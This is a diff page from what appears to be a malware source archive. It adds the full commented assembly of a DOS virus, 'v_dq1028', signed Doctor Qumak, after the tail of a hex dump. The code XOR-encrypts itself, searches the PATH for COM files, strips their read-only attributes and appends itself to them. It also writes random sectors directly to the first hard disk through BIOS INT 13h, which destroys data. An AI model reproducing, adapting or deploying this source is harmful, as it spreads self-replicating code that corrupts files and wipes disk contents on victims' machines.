114E:01F0 8B 84 75 00 24 1F 3C 1F-74 EE 81 BC 79 00 00 FA ..u.$.<.t...y...
114E:0200 77 E6 83 BC 79 00 0A 72-DF 8B BC 18 00 56 81 C6 w...y..r.....V..
114E:0210 7D 00 AC AA 3C 00 75 FA-5E B8 00 43 BA 1F 00 90 }...<.u.^..C....
114E:0220 03 D6 CD 21 89 8C 08 00-B8 01 43 81 E1 FE FF BA ...!......C.....
114E:0230 1F 00 90 03 D6 CD 21 B8-02 3D BA 1F 00 90 03 D6 ......!..=......
114E:0240 CD 21 73 03 E9 A5 00 8B-D8 B8 00 57 CD 21 89 8C .!s........W.!..
114E:0250 04 00 89 94 06 00 B4 2C-CD 21 80 E6 07 75 10 B4 .......,.!...u..
114E:0260 40 B9 05 00 8B D6 81 C2-8A 00 CD 21 EB 65 90 B4 @..........!.e..
114E:0270 3F B9 03 00 BA 0A 00 90-03 D6 CD 21 72 55 3D 03 ?..........!rU=.
114E:0280 00 75 50 B8 02 42 B9 00-00 BA 00 00 CD 21 72 43 .uP..B.......!rC
114E:0290 8B C8 2D 03 00 89 84 0E-00 81 C1 F9 02 8B FE 81 ..-.............
114E:02A0 EF F7 01 89 0D B4 40 B9-88 02 8B D6 81 EA F9 01 ......@.........
114E:02B0 CD 21 72 1F 3D 88 02 75-1A B8 00 42 B9 00 00 BA .!r.=..u...B....
114E:02C0 00 00 CD 21 72 0D B4 40-B9 03 00 8B D6 81 C2 0D ...!r..@........
114E:02D0 00 CD 21 8B 94 06 00 8B-8C 04 00 81 E1 E0 FF 81 ..!.............
114E:02E0 C9 1F 00 B8 01 57 CD 21-B4 3E CD 21 B8 01 43 8B .....W.!.>.!..C.
114E:02F0 8C 08 00 BA 1F 00 90 03-D6 CD 21 1E B4 1A 8B 94 ..........!.....
114E:0300 00 00 8E 9C 02 00 CD 21-1F 59 33 C0 33 DB 33 D2 .......!.Y3.3.3.
114E:0310 33 F6 BF 00 01 57 33 FF-C2 FF FF 80 00 46 0D 20 3....W3......F.
114E:0320 01 21 00 20 00 EB 15 90-E9 1F 00 2A 2E 43 4F 4D .!. .......*.COM
114E:0330 00 28 00 47 03 50 41 54-48 3D 52 45 53 45 54 2E .(.G.PATH=RESET.
114E:0340 43 4F 4D 00 00 00 00 4D-00 44 49 54 2E 43 4F 4D COM....M.DIT.COM
114E:0350 00 00 20 20 20 20 20 20-20 20 20 20 20 20 20 20 ..
114E:0360 20 20 20 20 20 20 20 20-20 20 20 20 20 20 20 20
114E:0370 20 20 20 20 20 20 20 20-20 20 01 3F 3F 3F 3F 3F .?????
114E:0380 3F 3F 3F 43 4F 4D 03 01-00 00 00 2E 8B 26 68 20 ???COM.......&h
114E:0390 20 01 21 00 22 00 00 00-52 45 53 45 54 2E 43 4F .!."...RESET.CO
114E:03A0 4D 00 00 4D 00 EA F0 FF-00 F0 16 7C 14 M..M.......|.


533
MSDOS/Virus.MSDOS.Unknown.v_dq1028.asm Normal file
View File

@ -0,0 +1,533 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
start: jmp l_02F3 ;0100 E9 01F0
db 6Bh,73h,0CAh,0Eh ;contamination ptr ;0103 6B 73 CA 0E
org 2F3h
;----------------------------------------------
l_02F3: push cx ;02F3 51
mov dx,offset d_0683 ;coded virus part addr ;02F4 BA 0683
nop ;02F7 90
;<--------- encoding
push dx ;02F8 52
pop bx ;02F9 5B
mov cx,0F9h ;coded block length ;02FA B9 00F9
mov si,dx ;02FD 8B F2
dec si ;02FF 4E
mov dl,[si] ;0300 8A 14
inc si ;0302 46
l_0303: mov al,[bx] ;encoding loop ;0303 8A 07
xor al,dl ;0305 32 C2
nop ;0307 90
mov [bx],al ;0308 88 07
inc bx ;030A 43
loop l_0303 ;030B E2 F6
mov dx,si ;030D 8B D6
;<----- restore changed bytes
xor ax,ax ;030F 33 C0
xor bx,bx ;0311 33 DB
cld ;0313 FC
mov si,dx ;0314 8B F2
add si,0ADh ;x_00AD ;saved bytes address ;0316 .81 C6 00AD
mov di,100h ;target address ;031A .BF 0100
mov cx,7 ;changed bytes ;031D B9 0007
nop ;0320 90
rep movsb ;0321 F3/ A4
mov si,dx ;0323 8B F2
mov byte ptr ds:[si+0F8h],0 ;x_00F8 ;0325 C6 84 00F8 00
mov ah,30h ;get DOS version nr ;032A B4 30
int 21h ;032C CD 21
cmp al,0 ;major version ;032E 3C 00
nop ;0330 90
jnz l_0335 ;0331 75 02
nop ;0333 90
nop ;0334 90
l_0335: mov bp,0BFh ;x_00BF ;0335 BD 00BF
add bp,si ;0338 03 EE
mov byte ptr ds:[bp],0 ;033A 3E: C6 46 00 00
push es ;033F 06
nop ;0340 90
mov ah,2Fh ;get DTA ptr into es:bx ;0341 B4 2F
int 21h ;0343 CD 21
mov [si],bx ;x_0000 ;0345 89 1C
mov [si+2],es ;x_0002 ;0347 8C 44 02
pop es ;034A 07
mov dx,5Fh ;x_005F ;034B .BA 005F
add dx,si ;034E 03 D6
mov ah,1Ah ;set DTA to ds:dx ;0350 B4 1A
int 21h ;0352 CD 21
push es ;0354 06
push si ;0355 56
mov es,ds:[2Ch] ;environment segment ;0356 8E 06 002C
mov di,0 ;035A .BF 0000
l_035D: pop si ;035D 5E
push si ;035E 56
add si,1Ah ;x_001A ('PATH=') ;035F 83 C6 1A
lodsb ;0362 AC
mov cx,8000h ;0363 B9 8000
repne scasb ;0366 F2/ AE
mov cx,4 ;0368 B9 0004
l_036B: lodsb ;036B AC
scasb ;036C AE
jnz l_035D ;036D 75 EE
loop l_036B ;036F E2 FA
;<----- Environment variable 'PATH='
pop si ;0371 5E
pop es ;0372 07
mov [si+16h],di ;x_0016 ;0373 89 7C 16
mov di,si ;0376 8B FE
add di,1Fh ;x_001F = work buffer ;0378 83 C7 1F
mov bx,si ;037B 8B DE
add si,1Fh ;x_001F = work buffer ;037D 83 C6 1F
mov di,si ;0380 8B FE
jmp short l_03CE ;0382 EB 4A
;<----- next directory
l_0384: cmp word ptr [si+16h],0 ;x_0016 = ptr in env ;0384 83 7C 16 00
jne l_0392 ;-> not all in 'PATH' ;0388 75 08
mov byte ptr ds:[si+0F8h],1 ;<- end of 'PATH' ;038A C6 84 00F8 01
jmp l_04E9 ;038F E9 0157
l_0392: push ds ;0392 1E
push si ;0393 56
mov bp,0BFh ;x_00BF ;0394 .BD 00BF
add bp,si ;0397 03 EE
mov ds,es:[02Ch] ;environment segment ;0399 26: 8E 1E 002C
mov di,si ;039E 8B FE
mov si,es:[di+16h] ;ptr in environment ;03A0 26: 8B 75 16
add di,1Fh ;pattern address ;03A4 83 C7 1F
l_03A7: lodsb ;03A7 AC
cmp al,';' ;directory delimiter ;03A8 3C 3B
je l_03BB ;03AA 74 0F
cmp al,0 ;03AC 3C 00
je l_03B8 ;position delimiter ;03AE 74 08
mov es:[bp],al ;03B0 26: 88 46 00
inc bp ;03B4 45
stosb ;03B5 AA
jmp short l_03A7 ;03B6 EB EF
l_03B8: mov si,0 ;end of path ptr ;03B8 .BE 0000
l_03BB: pop bx ;03BB 5B
pop ds ;03BC 1F
mov [bx+16h],si ;save current ptr ;03BD 89 77 16
cmp byte ptr [di-1],'\' ;last path char ;03C0 80 7D FF 5C
je l_03CE ;-> o.k. ;03C4 74 08
mov al,'\' ;<- add dir delimiter ;03C6 B0 5C
mov es:[bp],al ;03C8 26: 88 46 00
inc bp ;03CC 45
stosb ;03CD AA
l_03CE: mov byte ptr es:[bp],0 ;x_00BF ;03CE 26: C6 46 00 00
mov bp,0 ;03D3 BD 0000
mov [bx+18h],di ;[x_0018]:=x_001F ;03D6 89 7F 18
mov si,bx ;offset d_0683 ;03D9 8B F3
add si,10h ;x_0010 ('*.COM') ;03DB 83 C6 10
mov cx,6 ;03DE B9 0006
rep movsb ;03E1 F3/ A4
mov si,bx ;03E3 8B F3
mov ah,4Eh ;find 1st filenam match @ds:dx ;03E5 B4 4E
mov dx,01Fh ;x_001F (file pattern) ;03E7 .BA 001F
add dx,si ;03EA 03 D6
mov cx,3 ;attribute pattern ;03EC B9 0003
int 21h ;03EF CD 21
jmp short l_0429 ;03F1 EB 36
;<----- next file in the same directory
l_03F3: mov bp,0BFh ;file name address ;03F3 .BD 00BF
add bp,si ;03F6 03 EE
push bp ;03F8 55
mov ax,0 ;03F9 B8 0000
dec bp ;03FC 4D
l_03FD: inc bp ;03FD 45
cmp byte ptr ds:[bp],'\' ;begin of file name ;03FE 3E: 80 7E 00 5C
jne l_0407 ;0403 75 02
mov ax,bp ;possibly here ;0405 8B C5
l_0407: cmp byte ptr ds:[bp],0 ;end of filename ? ;0407 3E: 80 7E 00 00
jne l_03FD ;-> not now ;040C 75 EF
cmp ax,0 ;have been any dir ? ;040E 3D 0000
pop bp ;0411 5D
jnz l_041B ;-> yes ;0412 75 07
mov byte ptr ds:[bp],0 ;<- we are in the root ;0414 3E: C6 46 00 00
jmp short l_0425 ;0419 EB 0A
l_041B: mov bp,ax ;end of path address ;041B 8B E8
mov byte ptr ds:[bp+1],0 ;end ptr ;041D 3E: C6 46 01 00
mov bp,0 ;0422 BD 0000
l_0425: mov ah,4Fh ;find next file match ;0425 B4 4F
int 21h ;0427 CD 21
l_0429: jnc l_042E ;0429 73 03
jmp l_0384 ;-> end of files in current dir ;042B E9 FF56
l_042E: mov bp,0BFh ;x_00BF = victim name ;042E .BD 00BF
add bp,si ;0431 03 EE
dec bp ;0433 4D
l_0434: inc bp ;0434 45
cmp byte ptr ds:[bp],0 ;find end of path ;0435 3E: 80 7E 00 00
jne l_0434 ;043A 75 F8
mov di,bp ;043C 8B FD
mov bp,0 ;043E BD 0000
push si ;0441 56
add si,7Dh ;x_007D - DTA-file name ;0442 83 C6 7D
l_0445: lodsb ;add file name ;0445 AC
stosb ;0446 AA
cmp al,0 ;0447 3C 00
jne l_0445 ;0449 75 FA
pop si ;044B 5E
mov dx,si ;044C 8B D6
add dx,0BFh ;x_00BF = file name ;044E .81 C2 00BF
mov ax,3D00h ;open file R/O ;0452 B8 3D00
int 21h ;0455 CD 21
jnc l_045C ;0457 73 03
jmp l_0384 ;-> error, next dir ;0459 E9 FF28
l_045C: mov bx,ax ;file handle ;045C 8B D8
mov dx,0B8h ;x_00B8 = file buffer ;045E .BA 00B8
add dx,si ;0461 03 D6
mov cx,7 ;bytes to read ;0463 B9 0007
mov ah,3Fh ;read handle ;0466 B4 3F
int 21h ;0468 CD 21
mov ah,3Eh ;close handle ;046A B4 3E
int 21h ;046C CD 21
mov di,0BBh ;4,5,6,7 bytes from file;046E .BF 00BB
add di,si ;0471 03 FE
mov bx,0B4h ;contam. ptr pattern ;0473 .BB 00B4
add bx,si ;0476 03 DE
mov ax,[di] ;0478 8B 05
cmp ax,[bx] ;047A 3B 07
jne l_0489 ;-> not infected yet ;047C 75 0B
mov ax,[di+2] ;047E 8B 45 02
cmp ax,[bx+2] ;0481 3B 47 02
jne l_0489 ;-> not infected yet ;0484 75 03
l_0486: jmp l_03F3 ;-> allready infected ;0486 E9 FF6A
l_0489: cmp word ptr [si+79h],0FA00h ;file size ;0489 81 7C 79 FA00
nop ;048E 90
ja l_0486 ;-> to big ;048F 77 F5
cmp word ptr [si+79h],0Ah ;file size ;0491 83 7C 79 0A
jb l_0486 ;-> to small ;0495 72 EF
mov di,[si+18h] ;678Bh ?? ;0497 8B 7C 18
push si ;049A 56
add si,7Dh ;DTA - file name ;049B 83 C6 7D
l_049E: lodsb ;049E AC
stosb ;049F AA
cmp al,0 ;04A0 3C 00
jne l_049E ;04A2 75 FA
pop si ;04A4 5E
mov ax,4300h ;get file attrb, nam@ds:dx ;04A5 B8 4300
mov dx,01Fh ;file name ;04A8 .BA 001F
push si ;04AB 56
pop si ;04AC 5E
add dx,si ;04AD 03 D6
int 21h ;04AF CD 21
mov [si+8],cx ;save oryginal attributes ;04B1 89 4C 08
mov ax,4301h ;set file attrb, nam@ds:dx ;04B4 B8 4301
and cl,0FEh ;clear R/O ;04B7 80 E1 FE
mov dx,01Fh ;04BA .BA 001F
add dx,si ;04BD 03 D6
int 21h ;04BF CD 21
mov ax,3D02h ;open file R/W ;04C1 B8 3D02
mov dx,01Fh ;file name address ;04C4 .BA 001F
add dx,si ;04C7 03 D6
int 21h ;04C9 CD 21
jnc l_04D0 ;-> O.K. ;04CB 73 03
jmp l_0638 ;-> error ;04CD E9 0168
l_04D0: mov bx,ax ;file handle ;04D0 8B D8
mov ax,5700h ;get file date & time ;04D2 B8 5700
int 21h ; DOS Services ah=function 57h ;04D5 CD 21
mov [si+4],cx ;04D7 89 4C 04
mov [si+6],dx ;04DA 89 54 06
mov ah,2Ch ;get time ;04DD B4 2C
int 21h ;04DF CD 21
and dh,7 ;seconds ;04E1 80 E6 07
jz l_04E9 ;04E4 74 03
jmp l_0572 ;-> contamine ;04E6 E9 0089
;<- end of 'PATH' members
l_04E9: push bx ;04E9 53
push si ;04EA 56
mov ah,8 ;read parameters for drive dl ;04EB B4 08
mov dl,80h ;HDD 0 ;04ED B2 80
int 13h ;04EF CD 13
cmp dl,0 ;nr of fixed disks ;04F1 80 FA 00
je l_0562 ;-> no HDD ;04F4 74 6C
mov al,cl ;04F6 8A C1
and al,3Fh ; '?' ;04F8 24 3F
mov ds:[si+0F4h],al ;04FA 88 84 00F4
mov al,ch ;04FE 8A C5
mov ah,cl ;0500 8A E1
and ah,0C0h ;0502 80 E4 C0
mov cl,6 ;0505 B1 06
shr ah,cl ;0507 D2 EC
mov ds:[si+0F1h],ax ;0509 89 84 00F1
mov ds:[si+0F3h],dh ;050D 88 B4 00F3
l_0511: mov ah,2Ch ; ',' ;0511 B4 2C
int 21h ; DOS Services ah=function 2Ch ;0513 CD 21
; get time, cx=hrs/min, dh=sec
shr dl,1 ;0515 D0 EA
shr dl,1 ;0517 D0 EA
and dl,7 ;0519 80 E2 07
cmp dl,ds:[si+0F3h] ;051C 3A 94 00F3
ja l_0511 ;0520 77 EF
mov ds:[si+0F7h],dl ;0522 88 94 00F7
push ds ;0526 1E
mov ax,0 ;0527 B8 0000
mov ds,ax ;052A 8E D8
mov bx,046Ch ;052C .BB 046C
mov ax,[bx] ;052F 8B 07
mov dx,[bx+2] ;0531 8B 57 02
pop ds ;0534 1F
div word ptr ds:[si+0F1h] ;0535 F7 B4 00F1
l_0539: cmp dx,ds:[si+0F1h] ;0539 3B 94 00F1
jbe l_0543 ;053D 76 04
shr dx,1 ;053F D1 EA
jmp short l_0539 ;0541 EB F6
l_0543: mov ds:[si+0F5h],dx ;0543 89 94 00F5
mov ax,dx ;0547 8B C2
mov dl,80h ;0549 B2 80
mov dh,ds:[si+0F7h] ;054B 8A B4 00F7
mov ch,al ;054F 8A E8
mov cl,6 ;0551 B1 06
shl ah,cl ;0553 D2 E4
mov cl,ah ;0555 8A CC
mov ah,3 ;0557 B4 03
or cl,1 ;0559 80 C9 01
mov al,ds:[si+0F4h] ;055C 8A 84 00F4
int 13h ; Disk dl=drive 0 ah=func 03h ;0560 CD 13
; write sectors from mem es:bx
;<-----
l_0562: pop si ;0562 5E
pop bx ;0563 5B
cmp byte ptr ds:[si+0F8h],0 ;x_00F8 ;0564 80 BC 00F8 00
je l_056E ;-> O.K. ;0569 74 03
jmp l_0647 ;-> no 'PATH' ;056B E9 00D9
l_056E: jmp l_0628 ;056E E9 00B7
nop ;0571 90
;<----- contamine file
l_0572: mov ah,3Fh ; '?' ;0572 B4 3F
mov cx,7 ;0574 B9 0007
mov dx,0ADh ;0577 .BA 00AD
add dx,si ;057A 03 D6
int 21h ; DOS Services ah=function 3Fh ;057C CD 21
; read file, cx=bytes, to ds:dx
jnc l_0583 ;057E 73 03
jmp l_0628 ;0580 E9 00A5
l_0583: cmp ax,7 ;0583 3D 0007
je l_058B ;0586 74 03
jmp l_0628 ;0588 E9 009D
l_058B: mov ax,4202h ;058B B8 4202
mov cx,0 ;058E B9 0000
mov dx,0 ;0591 BA 0000
int 21h ; DOS Services ah=function 42h ;0594 CD 21
; move file ptr, cx,dx=offset
jnc l_059B ;0596 73 03
jmp l_0628 ;0598 E9 008D
l_059B: mov cx,ax ;059B 8B C8
sub ax,3 ;059D 2D 0003
mov [si+0Eh],ax ;05A0 89 44 0E
add cx,490h ;05A3 81 C1 0490
mov di,si ;05A7 8B FE
sub di,38Eh ;05A9 81 EF 038E
mov [di],cx ;05AD 89 0D
mov ah,40h ; '@' ;05AF B4 40
mov cx,489h ;05B1 B9 0489
mov dx,si ;05B4 8B D6
sub dx,390h ;05B6 81 EA 0390
push dx ;05BA 52
push cx ;05BB 51
push bx ;05BC 53
push ax ;05BD 50
mov ah,2Ch ; ',' ;05BE B4 2C
int 21h ; DOS Services ah=function 2Ch ;05C0 CD 21
; get time, cx=hrs/min, dh=sec
mov dl,cl ;05C2 8A D1
add dl,dh ;05C4 02 D6
add dl,82h ;05C6 80 C2 82
mov [si-1],dl ;05C9 88 54 FF
mov bx,si ;05CC 8B DE
mov cx,0F9h ;05CE B9 00F9
l_05D1: mov al,[bx] ;05D1 8A 07
xor al,dl ;05D3 32 C2
mov [bx],al ;05D5 88 07
inc bx ;05D7 43
loop l_05D1 ;05D8 E2 F7
pop ax ;05DA 58
pop bx ;05DB 5B
pop cx ;05DC 59
pop dx ;05DD 5A
int 21h ; DOS Services ah=function 40h ;05DE CD 21
; write file cx=bytes, to ds:dx
push dx ;05E0 52
push cx ;05E1 51
push bx ;05E2 53
push ax ;05E3 50
mov bx,si ;05E4 8B DE
mov cx,0F9h ;05E6 B9 00F9
mov dl,[si-1] ;05E9 8A 54 FF
l_05EC: mov al,[bx] ;05EC 8A 07
xor al,dl ;05EE 32 C2
nop ;05F0 90
mov [bx],al ;05F1 88 07
inc bx ;05F3 43
loop l_05EC ;05F4 E2 F6
pop ax ;05F6 58
pop bx ;05F7 5B
pop cx ;05F8 59
pop dx ;05F9 5A
jc l_0628 ;05FA 72 2C
cmp ax,489h ;05FC 3D 0489
jne l_0628 ;05FF 75 27
mov ax,4200h ;0601 B8 4200
nop ;0604 90
mov cx,0 ;0605 B9 0000
mov dx,0 ;0608 BA 0000
int 21h ; DOS Services ah=function 42h ;060B CD 21
; move file ptr, cx,dx=offset
jc l_0628 ;060D 72 19
mov ah,40h ; '@' ;060F B4 40
mov cx,3 ;0611 B9 0003
mov dx,si ;0614 8B D6
add dx,0Dh ;0616 83 C2 0D
int 21h ; DOS Services ah=function 40h ;0619 CD 21
; write file cx=bytes, to ds:dx
mov cx,4 ;061B B9 0004
mov dx,si ;061E 8B D6
add dx,0B4h ;0620 .81 C2 00B4
mov ah,40h ; '@' ;0624 B4 40
int 21h ; DOS Services ah=function 40h ;0626 CD 21
; write file cx=bytes, to ds:dx
l_0628: mov dx,[si+6] ;0628 8B 54 06
nop ;062B 90
mov cx,[si+4] ;062C 8B 4C 04
mov ax,5701h ;062F B8 5701
int 21h ; DOS Services ah=function 57h ;0632 CD 21
; get/set file date & time
mov ah,3Eh ; '>' ;0634 B4 3E
int 21h ; DOS Services ah=function 3Eh ;0636 CD 21
; close file, bx=file handle
l_0638: mov ax,4301h ;0638 B8 4301
mov cx,[si+8] ;063B 8B 4C 08
mov dx,01Fh ;063E .BA 001F
nop ;0641 90
add dx,si ;0642 03 D6
nop ;0644 90
int 21h ; DOS Services ah=function 43h ;0645 CD 21
; get/set file attrb, nam@ds:dx
;<----- EXIT
l_0647: push ds ;0647 1E
mov ah,1Ah ;set DTA to ds:dx ;0648 B4 1A
mov dx,[si] ;saved victim DTA ;064A 8B 14
mov ds,[si+2] ;064C 8E 5C 02
int 21h ;064F CD 21
pop ds ;restore registers ;0651 1F
pop cx ;0652 59
xor ax,ax ;0653 33 C0
xor bx,bx ;0655 33 DB
xor dx,dx ;0657 33 D2
xor si,si ;0659 33 F6
nop ;065B 90
mov di,100h ;Victim entry point ;065C .BF 0100
nop ;065F 90
push di ;0660 57
nop ;0661 90
xor di,di ;0662 33 FF
retn ;-> run victim ;0664 C3
db 1,2,3 ;0665 01 02 03
db 1,2,3 ;0668 01 02 03
db 4,5,6 ;066B 04 05 06
db 0Dh,0Ah ;066E 0D 0A
db '(C) DOCTOR QUMAK' ;0670 28 43 29 20 44 4F 43 54
;0678 4F 52 20 51 55 4D 41 4B
db 0Dh,0Ah ;0680 0D 0A
db 0B6h ;klucz kodowania ;0682 B6
d_0683 label byte
x_0000 dw 0080h ;victim DTA offset ;0000 80 00
x_0002 dw 10ABh ;victim DTA segment ;0003 AB 10
x_0004 dw 9BEFh ;victim time stamp ;0004 EF 9B
x_0006 dw 1587h ;victim date stamp ;0006 87 15
x_0008 dw 0020h ;victim attribute ;0008 20 00
db 0E9h,0F9h,00h ;000A E9 F9 00
db 0E9h,0F0h,01h ;000D E9 F0 01
x_0010 db '*.COM',0 ;0010 2A 2E 43 4F 4D 00
x_0016 dw 002Ah ;ptr in environment ;0016 2A 00
x_0018 dw 678Bh ;??? ;0018 8B 67
x_001A db 'PATH=' ;001A 50 41 54 48 3D
x_001F db 'CS.COM',0 ;001F 43 53 2E 43 4F 4D 00
db '.COM', 0 ;0026 2E 43 4F 4D 00
db 'T.COM', 0 ;002B 54 2E 43 4F 4D 00
db 'OM',0 ;0031 4F 4D 00
db 43 dup (' ') ;0034 002B[20]
;<----- virus DTA
x_005F db 04h ;005F 04
db '????????COM' ;0060 0008[3F] 43 4F 4D
db 03h,14h,00h,51h,01h,00h,00h,00h,00h ;006B 03 14 00 51 01 00 00 00 00
x_0074 db 20h ;attribute found ;0074 20
x_0075 dw 9BEFh ;time stamp ;0075 EF 9B
x_0077 dw 1587h ;date stamp ;0077 87 15
x_0079 dw 01F3h,0 ;file size ;0079 F3 01 00 00
x_007D db 'CS.COM',0,' COM',0,0 ;file name ;007D 43 53 2E 43 4F 4D 00 20 43 4F 4D 00 00
db 0EAh,0F0h ;008A EA F0
db 0FFh, 00h,0F0h ;008C FF 00 F0
db 'Hello world from my virus !',0Dh,0Ah,'$' ;008F 48 65 6C 6C 6F 20
;0095 77 6F 72 6C 64 20
;009B 66 72 6F 6D 20 6D
;00A1 79 20 76 69 72 75
;00A7 73 20 21 0D 0A 24
;<----- Saved victim bytes
x_00AD db 0EBh,00h,1Eh,0B8h,00h,00h,50h ;00AD EB 00 1E B8 00 00 50
;contamination pattern
x_00B4 db 6Bh,73h,0CAh,0Eh ;00B4 6B 73 CA 0E
;<----- file buffer
x_00B8 db 0EBh,00h,1Eh ;00B8 EB 00 1E
x_00BB db 0B8h,00h,00h,50h ;contam.ptr.here ;00BB B8 00 00 50
x_00BF db 'CS.COM',0 ;file name & path ;00BF 43 53 2E 43 4F 4D 00
db '.COM',0 ;00C6 2E 43 4F 4D 00
db 'T.COM', 0 ;00CB 54 2E 43 4F 4D 00
db 'M',0 ;00D1 4D 00
db ' the stuff that should be here' ;00D3 20 74 68 65 20 73
;00D9 74 75 66 66 20 74
;00DF 68 61 74 20 73 68
;00E5 6F 75 6C 64 20 62
;00EB 65 20 68 65 72 65
x_00F1 dw 0 ;00F1 00 00
x_00F3 db 0 ;00F3 00
x_00F4 db 0 ;00F4 00
x_00F5 dw 0 ;00F5 00 00
x_00F7 db 0 ;00F7 00
x_00F8 db 0 ;1=no path ;00F8 00
seg_a ends
end start